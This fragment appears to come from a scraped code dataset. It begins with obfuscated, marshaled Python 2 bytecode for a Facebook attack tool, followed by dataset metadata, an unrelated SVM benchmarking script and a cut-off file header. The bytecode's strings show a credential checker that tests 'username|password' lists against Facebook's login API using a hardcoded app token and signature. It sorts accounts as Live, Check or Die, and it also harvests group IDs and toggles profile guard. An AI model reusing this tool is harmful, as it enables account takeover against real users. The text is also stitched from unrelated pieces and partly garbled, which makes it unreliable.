\x1b[1;97m...s\xfc\x01\x00\x00%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%sid\x00\x00\x00s\x01\x00\x00\x00\ng\x00\x00\x00\x00\x00\x00\xf8?s/\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mSaved \x1b[1;91m: \x1b[1;97m %s.txts\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s\x11\x00\x00\x00\x1b[1;91m[!] Failed(\x0f\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00R \x00\x00\x00R\x19\x00\x00\x00R\x17\x00\x00\x00Rg\x00\x00\x00R@\x01\x00\x00(\x14\x00\x00\x00R4\x00\x00\x00Rm\x00\x00\x00R\xcc\x00\x00\x00R\xe1\x00\x00\x00R\xe2\x00\x00\x00R\x12\x00\x00\x00R\x1f\x00\x00\x00R0\x01\x00\x00t\x01\x00\x00\x00gt\x01\x00\x00\x00hR\x13\x00\x00\x00R\x1a\x00\x00\x00t\x01\x00\x00\x00kt\x01\x00\x00\x00lt\x01\x00\x00\x00mR\xa8\x00\x00\x00t\x02\x00\x00\x00wgt\x02\x00\x00\x00ent\x04\x00\x00\x00wordt\x03\x00\x00\x00gen(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\xfb\x00\x00\x00\xfb\x08\x00\x00sx\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\x03\x01\r\x01\x05\x01\x05\x01\t\x01\x0c\x01\x13\x01\x0c\x01\x0c\x01\x0c\x01\x0c\x01\r\x01\r\x01\n\x01\t\x01\x05\x01\x0c\x01\x0c\x01\x0c\x01\n\x01\r\x01\r\x01\n\x01\xff\x00\xff\x00}\x01\x06\x01\x0f\x01\n\x01\x1f\x01\x06\x01\x0f\x01\n\x01\x1f\x01\x06\x01\x0f\x01\n\x01\x1f\x01\x06\x01\x0f\x01\n\x01\x1f\x01\n\x01\r\x01\t\x01\t\x01\n\x01\x0b\x01\x0f\x01\x05\x01\n\x01c\x00\x00\x00\x00\r\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s@\x02\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x08\x00GHd\x07\x00GHd\x08\x00d\t\x00\x14GHg\x00\x00}\x01\x00g\x00\x00}\x02\x00g\x00\x00}\x03\x00y%\x00t\t\x00d\n\x00\x83\x01\x00}\x04\x00t\x02\x00|\x04\x00d\x03\x00\x83\x02\x00j\n\x00\x83\x00\x00}\x05\x00Wn\'\x00\x04t\x04\x00k\n\x00r\xe0\x00\x01\x01\x01d\x0b\x00GHt\t\x00d\x0c\x00\x83\x01\x00\x01t\x0b\x00\x83\x00\x00\x01n\x01\x00Xt\t\x00d\r\x00\x83\x01\x00}\x06\x00t\x0c\x00d\x0e\x00\x83\x01\x00\x01d\x08\x00d\t\x00\x14GHx\xe2\x00|\x05\x00D]\xda\x00}\x07\x00|\x07\x00j\r\x00\x83\x00\x00j\x0e\x00t\x0f\x00|\x06\x00\x83\x01\x00\x83\x01\x00\\\x02\x00}\x08\x00}\t\x00d\x0f\x00|\x08\x00\x17d\x10\x00\x17|\t\x00\x17d\x11\x00\x17}\n\x00t\x10\x00j\x11\x00|\n\x00\x83\x01\x00}\x0b\x00t\x12\x00j\x13\x00|\x0b\x00j\x14\x00\x83\x01\x00}\x0c\x00d\x12\x00|\x0c\x00k\x06\x00r\x92\x01|\x01\x00j\x15\x00|\t\x00\x83\x01\x00\x01d\x13\x00|\x08\x00\x17d\x14\x00\x17|\t\x00\x17GHq\x07\x01d\x15\x00|\x0c\x00d\x16\x00\x19k\x06\x00r\xc3\x01|\x02\x00j\x15\x00|\t\x00\x83\x01\x00\x01d\x17\x00|\x08\x00\x17d\x14\x00\x17|\t\x00\x17GHq\x07\x01|\x03\x00j\x15\x00|\t\x00\x83\x01\x00\x01d\x18\x00|\x08\x00\x17d\x14\x00\x17|\t\x00\x17GHq\x07\x01Wd\x08\x00d\t\x00\x14GHd\x19\x00t\x0f\x00t\x16\x00|\x01\x00\x83\x01\x00\x83\x01\x00\x17d\x1a\x00\x17t\x0f\x00t\x16\x00|\x02\x00\x83\x01\x00\x83\x01\x00\x17d\x1b\x00\x17t\x0f\x00t\x16\x00|\x03\x00\x83\x01\x00\x83\x01\x00\x17GHt\t\x00d\x0c\x00\x83\x01\x00\x01t\x0b\x00\x83\x00\x00\x01d\x00\x00S(\x1c\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00sB\x00\x00\x00\x1b[1;91m[?] \x1b[1;92mCreate in file\x1b[1;91m : \x1b[1;97musername|passwordi*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s,\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mFile path \x1b[1;91m:\x1b[1;97m s\x19\x00\x00\x00\x1b[1;91m[!] File not founds\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s,\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mSeparator \x1b[1;91m:\x1b[1;97m s$\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mStart \x1b[1;97m...s\x91\x00\x00\x00https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=s\x17\x00\x00\x00&locale=en_US&password=sH\x00\x00\x00&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6RQ\x00\x00\x00s%\x00\x00\x00\x1b[1;97m[ \x1b[1;92mLive\x1b[1;97m ] \x1b[1;97mR\xd4\x00\x00\x00s\x10\x00\x00\x00www.facebook.comR\xb4\x00\x00\x00s&\x00\x00\x00\x1b[1;97m[ \x1b[1;93mCheck\x1b[1;97m ] \x1b[1;97ms$\x00\x00\x00\x1b[1;97m[ \x1b[1;91mDie\x1b[1;97m ] \x1b[1;97ms4\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTotal\x1b[1;91m : \x1b[1;97mLive=\x1b[1;92ms\x15\x00\x00\x00 \x1b[1;97mCheck=\x1b[1;93ms\x13\x00\x00\x00 \x1b[1;97mDie=\x1b[1;91m(\x17\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00R\xf2\x00\x00\x00R@\x01\x00\x00R \x00\x00\x00R\xd8\x00\x00\x00R\xd5\x00\x00\x00R\x17\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R\x94\x00\x00\x00R\x0e\x00\x00\x00(\r\x00\x00\x00R4\x00\x00\x00t\x04\x00\x00\x00liveR7\x00\x00\x00t\x03\x00\x00\x00dieR\xcc\x00\x00\x00t\x04\x00\x00\x00listt\x07\x00\x00\x00pemisaht\x04\x00\x00\x00mekiR\xde\x00\x00\x00RC\x00\x00\x00Rk\x00\x00\x00Rl\x00\x00\x00R\xdf\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>RB\x01\x00\x008\t\x00\x00sT\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x05\x01\t\x01\x06\x01\x06\x01\x06\x01\x03\x01\x0c\x01\x19\x01\r\x01\x05\x01\n\x01\x0b\x01\x0c\x01\n\x01\t\x01\r\x01!\x01\x16\x01\x0f\x01\x12\x01\x0c\x01\r\x01\x14\x01\x10\x01\r\x01\x14\x02\r\x01\x15\x01\t\x01=\x01\n\x01c\x00\x00\x00\x00\x07\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\x1a\x02\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xy\x11\x00t\x00\x00j\x08\x00d\x07\x00\x83\x01\x00\x01Wn\x11\x00\x04t\t\x00k\n\x00r\x84\x00\x01\x01\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\n\x00GHy\xd4\x00t\x0b\x00j\x0c\x00d\x08\x00|\x00\x00\x17\x83\x01\x00}\x01\x00t\r\x00j\x0e\x00|\x01\x00j\x0f\x00\x83\x01\x00}\x02\x00xp\x00|\x02\x00d\t\x00\x19D]d\x00}\x03\x00|\x03\x00d\n\x00\x19}\x04\x00|\x03\x00d\x0b\x00\x19}\x05\x00t\x02\x00d\x0c\x00d\r\x00\x83\x02\x00}\x06\x00t\x10\x00j\x11\x00|\x05\x00\x83\x01\x00\x01|\x06\x00j\x12\x00|\x05\x00d\x0e\x00\x17\x83\x01\x00\x01d\x0f\x00t\x13\x00|\x05\x00\x83\x01\x00\x17d\x10\x00\x17t\x13\x00|\x04\x00\x83\x01\x00\x17GHq\xca\x00Wd\x11\x00d\x12\x00\x14GHd\x13\x00t\x14\x00t\x10\x00\x83\x01\x00\x16GHd\x14\x00GH|\x06\x00j\x15\x00\x83\x00\x00\x01t\x16\x00d\x15\x00\x83\x01\x00\x01t\x17\x00\x83\x00\x00\x01Wn\xa8\x00\x04t\x18\x00t\x19\x00f\x02\x00k\n\x00r\x9a\x01\x01\x01\x01d\x16\x00GHt\x16\x00d\x15\x00\x83\x01\x00\x01t\x17\x00\x83\x00\x00\x01n|\x00\x04t\x1a\x00k\n\x00r\xcd\x01\x01\x01\x01t\x00\x00j\x1b\x00d\x0c\x00\x83\x01\x00\x01d\x17\x00GHt\x16\x00d\x15\x00\x83\x01\x00\x01t\x17\x00\x83\x00\x00\x01nI\x00\x04t\x0b\x00j\x1c\x00j\x1d\x00k\n\x00r\xef\x01\x01\x01\x01d\x18\x00GHt\x1e\x00\x83\x00\x00\x01n\'\x00\x04t\x04\x00k\n\x00r\x15\x02\x01\x01\x01d\x19\x00GHt\x16\x00d\x15\x00\x83\x01\x00\x01t\x17\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(\x1a\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00R\x90\x00\x00\x00s2\x00\x00\x00https://graph.facebook.com/me/groups?access_token=Rl\x00\x00\x00R0\x00\x00\x00Rj\x00\x00\x00s\x0e\x00\x00\x00out/Grupid.txtR\x11\x00\x00\x00s\x01\x00\x00\x00\ns!\x00\x00\x00\x1b[1;97m[ \x1b[1;92mMyGroup\x1b[1;97m ] s\x04\x00\x00\x00 => i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s0\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTotal Group \x1b[1;91m:\x1b[1;97m %ss6\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mSaved \x1b[1;91m: \x1b[1;97mout/Grupid.txts\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s\x12\x00\x00\x00\x1b[1;91m[!] Stoppeds\x1a\x00\x00\x00\x1b[1;91m[!] Group not founds\x1a\x00\x00\x00\x1b[1;91m[\xe2\x9c\x96] No Connections\x10\x00\x00\x00\x1b[1;91m[!] Error(\x1f\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R\x91\x00\x00\x00R\x92\x00\x00\x00R.\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00t\x08\x00\x00\x00listgrupR\x94\x00\x00\x00R\x19\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00Rg\x00\x00\x00R/\x00\x00\x00R@\x01\x00\x00R\x96\x00\x00\x00R\x97\x00\x00\x00R,\x00\x00\x00t\x06\x00\x00\x00removeRi\x00\x00\x00R\x01\x00\x00\x00R\x08\x00\x00\x00(\x07\x00\x00\x00R4\x00\x00\x00t\x02\x00\x00\x00uht\x03\x00\x00\x00gudR\xf1\x00\x00\x00Rq\x00\x00\x00Rj\x00\x00\x00R0\x01\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>RC\x01\x00\x00f\t\x00\x00s\\\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\x03\x01\x11\x01\r\x01\x04\x01\r\x01\x05\x01\x03\x01\x13\x01\x12\x01\x11\x01\n\x01\n\x01\x0f\x01\r\x01\x11\x01!\x01\t\x01\x0f\x01\x05\x01\n\x01\n\x01\x0b\x01\x13\x01\x05\x01\n\x01\n\x01\r\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01\n\x01\r\x01\x05\x01\n\x01c\x00\x00\x00\x00\x03\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\r\x01\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00a\x04\x00Wn7\x00\x04t\x05\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x06\x00j\x07\x00d\x06\x00\x83\x01\x00\x01t\x08\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\t\x00GHd\x07\x00GHd\x08\x00GHd\t\x00GHd\n\x00GHt\n\x00d\x0b\x00\x83\x01\x00}\x00\x00|\x00\x00d\x0c\x00k\x02\x00r\xb4\x00d\r\x00}\x01\x00t\x0b\x00t\x04\x00|\x01\x00\x83\x02\x00\x01nU\x00|\x00\x00d\x0e\x00k\x02\x00r\xd6\x00d\x0f\x00}\x02\x00t\x0b\x00t\x04\x00|\x02\x00\x83\x02\x00\x01n3\x00|\x00\x00d\x10\x00k\x02\x00r\xec\x00t\x0c\x00\x83\x00\x00\x01n\x1d\x00|\x00\x00d\x11\x00k\x02\x00r\x02\x01t\r\x00\x83\x00\x00\x01n\x07\x00t\r\x00\x83\x00\x00\x01d\x00\x00S(\x12\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s.\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m1.\x1b[1;97m Activates2\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m2.\x1b[1;97m Not activates*\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;91m0.\x1b[1;97m Backs\x03\x00\x00\x00\xe2\x95\x91s\x1d\x00\x00\x00\x1b[1;97m\xe2\x95\x9a\xe2\x95\x90\x1b[1;91mD \x1b[1;97mR8\x00\x00\x00t\x04\x00\x00\x00trueR9\x00\x00\x00t\x05\x00\x00\x00falseR:\x00\x00\x00R\n\x00\x00\x00(\x0e\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R4\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00R\xc4\x00\x00\x00R@\x01\x00\x00R\x08\x00\x00\x00(\x03\x00\x00\x00RH\x01\x00\x00t\x05\x00\x00\x00aktift\x03\x00\x00\x00non(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>RD\x01\x00\x00\x97\t\x00\x00s4\x00\x00\x00\x00\x02\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x0c\x01\x0c\x01\x06\x01\x10\x01\x0c\x01\x06\x01\x10\x01\x0c\x01\n\x01\x0c\x01\n\x02c\x01\x00\x00\x00\x04\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s3\x00\x00\x00d\x01\x00|\x00\x00\x16}\x01\x00t\x00\x00j\x01\x00|\x01\x00\x83\x01\x00}\x02\x00t\x02\x00j\x03\x00|\x02\x00j\x04\x00\x83\x01\x00}\x03\x00|\x03\x00d\x02\x00\x19S(\x03\x00\x00\x00Ns-\x00\x00\x00https://graph.facebook.com/me?access_token=%sRj\x00\x00\x00(\x05\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00(\x04\x00\x00\x00R4\x00\x00\x00Rk\x00\x00\x00RG\x01\x00\x00t\x03\x00\x00\x00uid(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>t\n\x00\x00\x00get_userid\xb5\t\x00\x00s\x08\x00\x00\x00\x00\x01\n\x01\x0f\x01\x12\x01c\x02\x00\x00\x00\x07\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\xe7\x00\x00\x00t\x00\x00|\x00\x00\x83\x01\x00}\x02\x00d\x01\x00|\x01\x00t\x01\x00|\x02\x00\x83\x01\x00f\x02\x00\x16}\x03\x00i\x02\x00d\x02\x00d\x03\x006d\x04\x00|\x00\x00\x16d\x05\x006}\x04\x00d\x06\x00}\x05\x00t\x02\x00j\x03\x00|\x05\x00d\x07\x00|\x03\x00d\x08\x00|\x04\x00\x83\x01\x02}\x06\x00|\x06\x00j\x04\x00GHd\t\x00|\x06\x00j\x04\x00k\x06\x00r\x9d\x00t\x05\x00j\x06\x00d\n\x00\x83\x01\x00\x01t\x07\x00GHd\x0b\x00GHt\x08\x00d\x0c\x00\x83\x01\x00\x01t\t\x00\x83\x00\x00\x01nF\x00d\r\x00|\x06\x00j\x04\x00k\x06\x00r\xd7\x00t\x05\x00j\x06\x00d\n\x00\x83\x01\x00\x01t\x07\x00GHd\x0e\x00GHt\x08\x00d\x0c\x00\x83\x01\x00\x01t\t\x00\x83\x00\x00\x01n\x0c\x00d\x0f\x00GHt\n\x00\x83\x00\x00\x01d\x00\x00S(\x10\x00\x00\x00Ns\x8a\x01\x00\x00variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutations!\x00\x00\x00application/x-www-form-urlencodeds\x0c\x00\x00\x00Content-Types\x08\x00\x00\x00OAuth %st\r\x00\x00\x00Authorizations"\x00\x00\x00https://graph.facebook.com/graphqlRl\x00\x00\x00t\x07\x00\x00\x00headerss\x12\x00\x00\x00"is_shielded":trueR&\x00\x00\x00s*\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mActivates\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s\x13\x00\x00\x00"is_shielded":falses.\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;91mNot activates\x10\x00\x00\x00\x1b[1;91m[!] Error(\x0b\x00\x00\x00R_\x01\x00\x00R\x17\x00\x00\x00Rb\x00\x00\x00Rh\x00\x00\x00Rf\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00R@\x01\x00\x00R\x08\x00\x00\x00(\x07\x00\x00\x00R4\x00\x00\x00t\x06\x00\x00\x00enableRj\x00\x00\x00Rl\x00\x00\x00Ra\x01\x00\x00Rk\x00\x00\x00RG\x01\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\xc4\x00\x00\x00\xbb\t\x00\x00s(\x00\x00\x00\x00\x01\x0c\x01\x16\x01\x18\x01\x06\x01\x1b\x01\x08\x01\x0f\x01\r\x01\x05\x01\x05\x01\n\x01\n\x01\x0f\x01\r\x01\x05\x01\x05\x01\n\x01\n\x02\x05\x01(\x02\x00\x00\x00s\n\x00\x00\x00User-AgentsR\x00\x00\x00Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16(v\x00\x00\x00R\x05\x00\x00\x00R\x06\x00\x00\x00R\x1c\x00\x00\x00t\x08\x00\x00\x00datetimeR\x0c\x00\x00\x00R^\x00\x00\x00R\xa1\x00\x00\x00R\xce\x00\x00\x00Rd\x00\x00\x00RS\x00\x00\x00R\xbb\x00\x00\x00t\t\x00\x00\x00cookielibt\x14\x00\x00\x00multiprocessing.poolR\x00\x00\x00\x00RU\x00\x00\x00t\x0b\x00\x00\x00ImportErrorR(\x00\x00\x00Rb\x00\x00\x00t\x13\x00\x00\x00requests.exceptionsR\x01\x00\x00\x00R\x02\x00\x00\x00t\x06\x00\x00\x00reloadt\x12\x00\x00\x00setdefaultencodingRT\x00\x00\x00t\x11\x00\x00\x00set_handle_robotst\x05\x00\x00\x00Falset\x12\x00\x00\x00set_handle_refresht\x05\x00\x00\x00_httpt\x14\x00\x00\x00HTTPRefreshProcessort\n\x00\x00\x00addheadersR\x08\x00\x00\x00R\x14\x00\x00\x00R\x0f\x00\x00\x00R \x00\x00\x00R.\x00\x00\x00R#\x00\x00\x00R\xd9\x00\x00\x00R\xd2\x00\x00\x00R\xda\x00\x00\x00R\xdb\x00\x00\x00R\xe5\x00\x00\x00R\xdc\x00\x00\x00R\x93\x00\x00\x00R\x9b\x00\x00\x00R\x9f\x00\x00\x00R\xa3\x00\x00\x00R\xa4\x00\x00\x00Rj\x00\x00\x00R\xa5\x00\x00\x00R\xa6\x00\x00\x00R\xa7\x00\x00\x00R\xa9\x00\x00\x00R&\x01\x00\x00R-\x01\x00\x00R.\x01\x00\x00R1\x01\x00\x00RV\x01\x00\x00t\x06\x00\x00\x00vulnott\x04\x00\x00\x00vulnR0\x00\x00\x00R1\x00\x00\x00R3\x00\x00\x00R=\x00\x00\x00R2\x00\x00\x00R;\x00\x00\x00R+\x00\x00\x00Rr\x00\x00\x00Ru\x00\x00\x00R\x80\x00\x00\x00R\x7f\x00\x00\x00R\x87\x00\x00\x00R\x88\x00\x00\x00R\x89\x00\x00\x00R\x8a\x00\x00\x00R\x8b\x00\x00\x00R?\x00\x00\x00R\x8c\x00\x00\x00R\x8d\x00\x00\x00R\x8e\x00\x00\x00Rv\x00\x00\x00R\xaa\x00\x00\x00R\xab\x00\x00\x00R\xac\x00\x00\x00R\xd0\x00\x00\x00R\xad\x00\x00\x00R\xae\x00\x00\x00R\xe3\x00\x00\x00R\xaf\x00\x00\x00R\xf3\x00\x00\x00R\xb0\x00\x00\x00R\xfd\x00\x00\x00R\xfe\x00\x00\x00R\xff\x00\x00\x00R\x00\x01\x00\x00R\x01\x01\x00\x00R\x11\x01\x00\x00R\x10\x01\x00\x00R\x12\x01\x00\x00R\x1a\x01\x00\x00R"\x01\x00\x00R\x13\x01\x00\x00R+\x01\x00\x00R,\x01\x00\x00R\x14\x01\x00\x00R\x15\x01\x00\x00R\x16\x01\x00\x00R\x17\x01\x00\x00R\x18\x01\x00\x00R@\x01\x00\x00R?\x01\x00\x00RA\x01\x00\x00R\xfb\x00\x00\x00RB\x01\x00\x00RC\x01\x00\x00RD\x01\x00\x00R_\x01\x00\x00RW\x00\x00\x00R\xc4\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>t\x08\x00\x00\x00<module>\x08\x00\x00\x00s\xd2\x00\x00\x00\x90\x01\x10\x01\x03\x01\x10\x01\r\x01\x11\x01\x03\x01\x10\x01\r\x01\x11\x01\x10\x01\x10\x04\n\x01\r\x01\x0c\x01\r\x01\x1c\x01\x0c\x03\t\x05\t\x07\t\n\t\x14\x06\x03\t\x05\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x02\t!\t\x17\t7\t\x17\t#\t\x1b\t7\t\x19\t"\t2\t;\t:\t@\t@\t7\tA\t9\tA\t\x14\t\x17\t\xb3\t\x1c\t&\t\x0f\t\x13\t\xa7\t6\t\x13\t\x14\t\x14\t=\tF\tF\t?\t\x16\t\x1a\t\x15\t\x1e\t!\t\x15\t\x1e\t)\t$\t,\t(\t!\t"\t\x14\t\x16\t\x1a\t=\t.\t1\t\x1e\t\x06\x0c\x17'''))
|
[
"[email protected]"
] | |
0187aa1b8fa9854b1f253d952bda031992f4b423
|
20a3cc1106fa86fc2d45cd1728cc87d5db97e1f7
|
/old/pddbm/bug3.py
|
7d0a81d444b74c37e2e621dc7a08f50608b54c18
|
[] |
no_license
|
sarahboufelja54/galatea
|
f5664f0b3117629b2c5bbe078a1bd52bb5e359e6
|
002a9f2905868be25b71770190fb2d5eda11c861
|
refs/heads/master
| 2020-12-04T13:45:07.697189 | 2018-12-12T16:27:09 | 2018-12-12T16:27:19 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,268 |
py
|
import numpy as np
from sklearn.svm import SVC
import time
rng = np.random.RandomState([1,2,3])
m = 1000
n = 1000
X = rng.randn(m,n)
w = rng.randn(n)
b = rng.randn(1)
y = (np.dot(X,w) + b ) > 0
t1 = time.time()
svm = SVC(kernel = 'linear', C = 1.0).fit(X,y)
t2 = time.time()
print 'train time ',t2 - t1
t1 = time.time()
y1 = svm.predict(X)
t2 = time.time()
print 'predict time ',t2 - t1
print '# support vectors:',svm.n_support_
print 'predict time per support vector:',(t2-t1)/float(svm.n_support_.sum())
coef = svm.coef_[0,:]
orig_coef = svm.coef_
t1 = time.time()
f = - np.dot(X, orig_coef.T) + svm.intercept_
y2 = f < 0
print y.shape
print y2.shape
print (y2 == y).shape
quit(-1)
t2 = time.time()
print 'dot product time',t2 -t1
print 'class 1 prevalence ',y.mean()
print 'predict accuracy ',(y1 == y).mean()
print 'dot product accuracy ',(y2 == y).mean()
print 'predict and dot agreement rate',(y1 == y2).mean()
coefs = svm.dual_coef_
assert len(coefs.shape) == 2
assert coefs.shape[0] == 1
coefs = coefs[0,:]
w = np.dot(svm.support_vectors_.T, coefs)
assert np.allclose(w,-coef)
f = np.dot(X,w) + b
y3 = (f < 0)
print 'agreement rate with my method: ',(y3 == y1).mean()
print 'dot prod between sklearn coef_ and my coef_: ',np.dot(w,svm.coef_[0,:])
|
[
"[email protected]"
] | |
14af6f90daa0b86d6aa3eb173dd22c4267364a3e
|
500a32cfae24028417215a79146c04d8cd0f12a3
|
/Figures/FigureS4.py
|
05fbe12a5889a12b91b07fcc4905e52285789c73
|
[] |
no_license
|
daphnar/URA_paper
|
